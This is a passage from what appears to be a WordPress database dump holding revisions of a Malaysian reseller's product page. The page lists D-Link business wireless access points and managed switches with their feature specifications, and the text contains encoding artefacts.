VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>','D-Link','','inherit','closed','closed','','1480-revision-v1','','','2019-09-25 14:24:05','2019-09-25 06:24:05','',1480,'https://bintara.com.my/blog/2019/09/25/1480-revision-v1/',0,'revision','',0),(3391,1,'2019-09-25 14:24:58','2019-09-25 06:24:58','<h2>D - Link Business Solution Product </h2>		\n			<h3>Business Wireless</h3>		\n			<h4>AC1750 Wave 2 Dualâ€‘Band WI-FI PoE Access Pointâ€‹</h4>		\n										<img width=\"300\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-300x300.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-300x300.png 300w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3.png 500w\" sizes=\"(max-width: 300px) 100vw, 300px\" />											\n		<p>Â 802.11ac Wave 2 wireless, up to 1.75 Gbps</p><p>MU-MIMO with beamforming</p><p>Band steering</p><p>Gigabit PoE-capable LAN port</p><p>AP Array utility support</p><p>Free D-Link Central WiFiManager</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>2.4GHz Wireless N300 Outdoor Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600-255x300.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600-255x300.jpg 255w, https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600.jpg 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<p>Wireless N300 Mbps 2.4GHz Single Band Outdoor Access Point with POE Pass-Through</p><p>Two 10/100 Ethernet ports (one supporting PoE) allow for further physical expansion</p><p>Built-in 10 dBi sector antenna with high power output ensuring that wireless coverage</p><p>Weather-proof design (IPX6) built to withstand harsh environments</p><p>Supports multiple operation modes â€“ AP,WDS with AP, Client, Repeater, WISP Client &amp; Repeater</p><p>Supports 802.1Q VLAN Tagging, operating with multiple SSIDs to segment traffic</p><p>Provides WLAN partitioning for deployments such as wireless hot spots</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>AC1750 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-255x300.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-255x300.png 255w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600.png 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<p>Up to 1750 MBPS high-speed wireless performance on 802.11ac standards</p><p>Support Wireless Speed of 450 MB over 2.4 GHz &amp; 1300 MbpsÂ  Over 5 GHz band</p><p>Support load balancing to ensure maximum performance by limiting userÂ  per AP</p><p>Support Wi-Fi Multimedia QoS for audio, video, and voice applications</p><p>Six detachable antennas for optimal wireless coverage over 2.4 GHzÂ  or 5 GHz band</p><p>Two Gigabit LAN ports , One Port Support 802.at Power over Ethernet</p><p>Support multiple operation â€“ AP, WDS with AP, WDS/Bridge and Client</p><p>RuggedÂ  metal housing &amp;Â  Plenum-rated chassis</p><p>Built in Radius ServerÂ  allowing users to create their accounts within the device itself.</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>N600 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600-255x300.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600-255x300.png 255w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600.png 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<p>802.11ac Wave 2 wireless, up to 1.75 Gbps</p><p>MU-MIMO with beamforming</p><p>Band steering</p><p>Gigabit PoE-capable LAN port</p><p>AP Array utility support</p><p>Free D-Link Central WiFiManager</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>AC1300 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600-255x300.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600-255x300.jpg 255w, https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600.jpg 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<h4 style=\"text-align: center;\">Enjoy High-performance Wireless Connectivity</h4><p style=\"text-align: left;\">Harness the power of IEEE 802.11ac Wave 2 wireless and experience wireless speeds of up to 1300 Mbps, perfect for high-demand business applications</p><h4 style=\"text-align: center;\">MU-MIMO with Beamforming</h4><p>Dramatically improves the wireless range and performance as well as allowing multiple devices to connect simultaneously to the wireless network</p><h4 style=\"text-align: center;\">Multiple Operational Modes</h4><p>Flexible options allows the DAP-2610 to function as an access point, a Wireless Distribution System (WDS), a WDS with access point, or a wireless client</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>N300 Wireless PoE Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600-255x300.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600-255x300.jpg 255w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600.jpg 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<p>High-speed wireless performance with 300 Mbps wireless signal rates</p><p>Support Wi-fi Multimediaâ„¢ (WMM) for audio, video, and voice applications</p><p>Gigabit Ethernet port with 802.3af Power over EthernetMultiple operation modes: AP, WDS with AP, WDS/Bridgeanf Client</p><p>Support Inbuilt Radius server, Network Access protection (NAP)</p><p>Equipped with 8 VLANs per band for multiple SSIDsÂ  Implementation</p><p>Support Central WiFi Manager to configure and manage multiple AP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h3>Smart Switch</h3>		\n			<h4>12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 8 Ports 10G Base-T + Two 10 Gigabit SFP+ Slots +2 10GBase-T/SFP+ Combo Slots<br />â€¢ Suitable for virtualization, cloud services and server-to-server applications<br />â€¢ D-link Green Technology conserves energy by powering down unused ports<br />â€¢ Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br />â€¢ Support G.8032 ERPS to achieve high reliability and network stability<br />â€¢ 802.1X port based authentication, for authentication through external RADIUS servers<br />â€¢ Support D-Link Network Assistant Utility to simplifies the configuration<br />â€¢ Loopback Detection automatically disables port or VLAN when a loop is detected<br />â€¢ Support IGMP &amp; MLD Snooping and 802.3x Flow Control</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 8 Ports 10G SFP+, Two 10 Gigabit Base-T /SFP+ Combo Ports<br />â€¢ Suitable for virtualization, cloud services and server-to-server applications<br />â€¢ D-link Green Technology conserves energy by powering down unused ports<br />â€¢ Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br />â€¢ Support G.8032 ERPS to achieve high reliability and network stability<br />â€¢ 802.1X port based authentication, for authentication through external RADIUS servers<br />â€¢ Support D-Link Network Assistant Utility to simplifies the configuration<br />â€¢ Loopback Detection automatically disables port or VLAN when a loop is detected<br />â€¢ Support IGMP &amp; MLD Snooping and 802.3x Flow Control</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>26-Port Layer 2 Lite Smart Managed Gigabit Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Port 10/100/1000 Base-T with 2 Gigabit SFP Ports<br />â€¢ Equipped with 802.3az Energy Efficient Ethernet (EEE) Complaint<br />â€¢ Support IEEE 802.1Q VLAN traffic segregation<br />â€¢ Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br />â€¢ Loopback detection (LBD) and broadcast storm control to avoid network downtime<br />â€¢ Quality of Service (QOS) and bandwidth control to ensure smooth operation<br />â€¢ Cable diagnostics function to help troubleshooting wiring problem<br />â€¢ Support Web-based GUI, Smart Console , Network Assistance Utility</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>10 Gigabit Ethernet Smart Managed Switches</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1.png 510w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1-255x300.png 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>10 Gigabit Ethernet Connection</p><p>Improved Power Efficiency</p><p>Smart and Flexible Management</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>52-Port Layer 2 Smart Managed Gigabit PoE Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 48 Ports 10/100/1000 Base-T PoE + 4 slots for Gigabit SFP<br />â€¢ Support IEEE 802.3af , 802.3at POE with Power Budget up to 740 W<br />â€¢ Equipped with IEEE 802.3az Energy Efficient Ethernet (EEE) Complaint<br />â€¢ Support IEEE 802.1Q VLAN traffic segregation<br />â€¢ Access Control List (ACL) feature to enhances network security<br />â€¢ Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br />â€¢ Loopback detection (LBD) and broadcast storm control to avoid network downtime<br />â€¢ Quality of Service (QOS) and bandwidth control to ensure smooth operation<br />â€¢ Support Web-based GUI, Smart Console , Network Assistance Utility<br />â€¢ Cable diagnostics function to help troubleshooting wiring problem</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>52-Port Layer 3 Lite Smart Managed Gigabit Switch with 2 10G Uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 48 Ports 10/100/1000 Base-T + 2 SFP Ports + 2 x 10G SFP+ Slots</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Built-in SNMP MIB for remote NetworkÂ Management Systems</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>28-Port Layer 3 Lite Smart Managed Gigabit PoE Switch with 4 10G uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Ports 10/100/1000 Base-T PoE + 4 x 10G SFP+ Slots</p><p>â€¢Â Support IEEE 802.3af (PoE) and 802.3at (PoE+) Â with Power Budget of 370W</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>28-Port Layer 3 Lite Smart Managed Gigabit Switch with 4 10G uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Ports 10/100/1000 Base-T PoE + 4 x 10G SFP+ Slots</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>','D-Link','','inherit','closed','closed','','1480-revision-v1','','','2019-09-25 14:24:58','2019-09-25 06:24:58','',1480,'https://bintara.com.my/blog/2019/09/25/1480-revision-v1/',0,'revision','',0),(3392,1,'2019-09-25 14:25:23','2019-09-25 06:25:23','<h2>D - Link Business Solution Product </h2>		\n			<h3>Business Wireless</h3>		\n			<h4>AC1750 Wave 2 Dualâ€‘Band WI-FI PoE Access Pointâ€‹</h4>		\n										<img width=\"300\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-300x300.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-300x300.png 300w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3.png 500w\" sizes=\"(max-width: 300px) 100vw, 300px\" />											\n		<p>Â 802.11ac Wave 2 wireless, up to 1.75 Gbps</p><p>MU-MIMO with beamforming</p><p>Band steering</p><p>Gigabit PoE-capable LAN port</p><p>AP Array utility support</p><p>Free D-Link Central WiFiManager</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>2.4GHz Wireless N300 Outdoor Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600-255x300.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600-255x300.jpg 255w, https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600.jpg 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<p>Wireless N300 Mbps 2.4GHz Single Band Outdoor Access Point with POE Pass-Through</p><p>Two 10/100 Ethernet ports (one supporting PoE) allow for further physical expansion</p><p>Built-in 10 dBi sector antenna with high power output ensuring that wireless coverage</p><p>Weather-proof design (IPX6) built to withstand harsh environments</p><p>Supports multiple operation modes â€“ AP,WDS with AP, Client, Repeater, WISP Client &amp; Repeater</p><p>Supports 802.1Q VLAN Tagging, operating with multiple SSIDs to segment traffic</p><p>Provides WLAN partitioning for deployments such as wireless hot spots</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>AC1750 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-255x300.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-255x300.png 255w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600.png 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<p>Up to 1750 MBPS high-speed wireless performance on 802.11ac standards</p><p>Support Wireless Speed of 450 MB over 2.4 GHz &amp; 1300 MbpsÂ  Over 5 GHz band</p><p>Support load balancing to ensure maximum performance by limiting userÂ  per AP</p><p>Support Wi-Fi Multimedia QoS for audio, video, and voice applications</p><p>Six detachable antennas for optimal wireless coverage over 2.4 GHzÂ  or 5 GHz band</p><p>Two Gigabit LAN ports , One Port Support 802.at Power over Ethernet</p><p>Support multiple operation â€“ AP, WDS with AP, WDS/Bridge and Client</p><p>RuggedÂ  metal housing &amp;Â  Plenum-rated chassis</p><p>Built in Radius ServerÂ  allowing users to create their accounts within the device itself.</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>N600 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600-255x300.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600-255x300.png 255w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600.png 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<p>802.11ac Wave 2 wireless, up to 1.75 Gbps</p><p>MU-MIMO with beamforming</p><p>Band steering</p><p>Gigabit PoE-capable LAN port</p><p>AP Array utility support</p><p>Free D-Link Central WiFiManager</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>AC1300 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600-255x300.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600-255x300.jpg 255w, https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600.jpg 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<h4 style=\"text-align: center;\">Enjoy High-performance Wireless Connectivity</h4><p style=\"text-align: left;\">Harness the power of IEEE 802.11ac Wave 2 wireless and experience wireless speeds of up to 1300 Mbps, perfect for high-demand business applications</p><h4 style=\"text-align: center;\">MU-MIMO with Beamforming</h4><p>Dramatically improves the wireless range and performance as well as allowing multiple devices to connect simultaneously to the wireless network</p><h4 style=\"text-align: center;\">Multiple Operational Modes</h4><p>Flexible options allows the DAP-2610 to function as an access point, a Wireless Distribution System (WDS), a WDS with access point, or a wireless client</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>N300 Wireless PoE Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600-255x300.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600-255x300.jpg 255w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600.jpg 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<p>High-speed wireless performance with 300 Mbps wireless signal rates</p><p>Support Wi-fi Multimediaâ„¢ (WMM) for audio, video, and voice applications</p><p>Gigabit Ethernet port with 802.3af Power over EthernetMultiple operation modes: AP, WDS with AP, WDS/Bridgeanf Client</p><p>Support Inbuilt Radius server, Network Access protection (NAP)</p><p>Equipped with 8 VLANs per band for multiple SSIDsÂ  Implementation</p><p>Support Central WiFi Manager to configure and manage multiple AP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h3>Smart Switch</h3>		\n			<h4>12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 8 Ports 10G Base-T + Two 10 Gigabit SFP+ Slots +2 10GBase-T/SFP+ Combo Slots<br />â€¢ Suitable for virtualization, cloud services and server-to-server applications<br />â€¢ D-link Green Technology conserves energy by powering down unused ports<br />â€¢ Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br />â€¢ Support G.8032 ERPS to achieve high reliability and network stability<br />â€¢ 802.1X port based authentication, for authentication through external RADIUS servers<br />â€¢ Support D-Link Network Assistant Utility to simplifies the configuration<br />â€¢ Loopback Detection automatically disables port or VLAN when a loop is detected<br />â€¢ Support IGMP &amp; MLD Snooping and 802.3x Flow Control</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 8 Ports 10G SFP+, Two 10 Gigabit Base-T /SFP+ Combo Ports<br />â€¢ Suitable for virtualization, cloud services and server-to-server applications<br />â€¢ D-link Green Technology conserves energy by powering down unused ports<br />â€¢ Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br />â€¢ Support G.8032 ERPS to achieve high reliability and network stability<br />â€¢ 802.1X port based authentication, for authentication through external RADIUS servers<br />â€¢ Support D-Link Network Assistant Utility to simplifies the configuration<br />â€¢ Loopback Detection automatically disables port or VLAN when a loop is detected<br />â€¢ Support IGMP &amp; MLD Snooping and 802.3x Flow Control</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>26-Port Layer 2 Lite Smart Managed Gigabit Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Port 10/100/1000 Base-T with 2 Gigabit SFP Ports<br />â€¢ Equipped with 802.3az Energy Efficient Ethernet (EEE) Complaint<br />â€¢ Support IEEE 802.1Q VLAN traffic segregation<br />â€¢ Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br />â€¢ Loopback detection (LBD) and broadcast storm control to avoid network downtime<br />â€¢ Quality of Service (QOS) and bandwidth control to ensure smooth operation<br />â€¢ Cable diagnostics function to help troubleshooting wiring problem<br />â€¢ Support Web-based GUI, Smart Console , Network Assistance Utility</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>10 Gigabit Ethernet Smart Managed Switches</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1.png 510w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1-255x300.png 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>10 Gigabit Ethernet Connection</p><p>Improved Power Efficiency</p><p>Smart and Flexible Management</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>52-Port Layer 2 Smart Managed Gigabit PoE Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 48 Ports 10/100/1000 Base-T PoE + 4 slots for Gigabit SFP<br />â€¢ Support IEEE 802.3af , 802.3at POE with Power Budget up to 740 W<br />â€¢ Equipped with IEEE 802.3az Energy Efficient Ethernet (EEE) Complaint<br />â€¢ Support IEEE 802.1Q VLAN traffic segregation<br />â€¢ Access Control List (ACL) feature to enhances network security<br />â€¢ Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br />â€¢ Loopback detection (LBD) and broadcast storm control to avoid network downtime<br />â€¢ Quality of Service (QOS) and bandwidth control to ensure smooth operation<br />â€¢ Support Web-based GUI, Smart Console , Network Assistance Utility<br />â€¢ Cable diagnostics function to help troubleshooting wiring problem</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>52-Port Layer 3 Lite Smart Managed Gigabit Switch with 2 10G Uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 48 Ports 10/100/1000 Base-T + 2 SFP Ports + 2 x 10G SFP+ Slots</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Built-in SNMP MIB for remote NetworkÂ Management Systems</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving 